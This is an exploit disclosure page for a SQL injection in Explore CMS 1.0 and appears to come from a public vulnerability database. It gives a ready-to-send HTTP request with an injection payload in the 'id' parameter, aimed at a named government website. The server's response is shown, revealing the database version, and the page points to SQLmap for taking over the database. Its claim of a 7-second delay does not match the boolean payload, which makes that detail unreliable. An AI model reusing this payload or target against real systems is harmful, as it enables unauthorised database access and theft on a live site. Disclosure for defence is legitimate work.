Explore CMS 1.0 SQL Injection

2022.04.13
Credit: Sajibe Kanti
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: explore CMS - Boolean Based SQL Injection # Date: 19/03/2022 # Exploit Author: Sajibe Kanti # Vendor Name : EXPLORE IT # Vendor Homepage: https://exploreit.com.bd # CVE: On Request # POC #SQL Injection SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. explore CMS is vulnerable to the SQL Injection in 'id' parameter of the 'page' page. #Steps to reproduce Following URL is vulnerable to SQL Injection in the 'id' field. GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1 Host: www.gdc.gov.bd Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320 Referer: https://www.gdc.gov.bd/ User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 HTTP/1.1 200 OK content-encoding: server: LiteSpeed Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html; charset=UTF-8 transfer-encoding: chunked date: Thu, 17 Mar 2022 07:27:21 GMT vary: Accept-Encoding 10.3.34-MariaDB Server accepts the payload and the response get delayed by 7 seconds. #Impact An attcker can compromise the database of the application by manual method or by automated tools such as SQLmap. -- Thanks Sajibe Kanti


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top